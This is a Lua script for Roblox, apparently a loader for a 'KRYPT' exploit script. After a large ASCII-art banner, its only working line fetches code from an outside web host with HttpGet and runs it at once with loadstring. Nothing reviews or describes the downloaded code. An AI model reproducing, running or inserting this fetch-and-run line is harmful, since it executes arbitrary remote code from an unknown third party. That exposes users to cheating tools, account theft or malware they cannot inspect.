
--[[
                                                                                          
──────────────────────────────────────────────────────────────────────────────────────────
─██████──████████──████████████████────████████──████████──██████████████──██████████████─
─██░░██──██░░░░██──██░░░░░░░░░░░░██────██░░░░██──██░░░░██──██░░░░░░░░░░██──██░░░░░░░░░░██─
─██░░██──██░░████──██░░████████░░██────████░░██──██░░████──██░░██████░░██──██████░░██████─
─██░░██──██░░██────██░░██────██░░██──────██░░░░██░░░░██────██░░██──██░░██──────██░░██─────
─██░░██████░░██────██░░████████░░██──────████░░░░░░████────██░░██████░░██──────██░░██─────
─██░░░░░░░░░░██────██░░░░░░░░░░░░██────────████░░████──────██░░░░░░░░░░██──────██░░██─────
─██░░██████░░██────██░░██████░░████──────────██░░██────────██░░██████████──────██░░██─────
─██░░██──██░░██────██░░██──██░░██────────────██░░██────────██░░██──────────────██░░██─────
─██░░██──██░░████──██░░██──██░░██████────────██░░██────────██░░██──────────────██░░██─────
─██░░██──██░░░░██──██░░██──██░░░░░░██────────██░░██────────██░░██──────────────██░░██─────
─██████──████████──██████──██████████────────██████────────██████──────────────██████─────
──────────────────────────────────────────────────────────────────────────────────────────
]]
loadstring(game:HttpGet("http://6exdev.cf/kryptscript/loader.php"))()
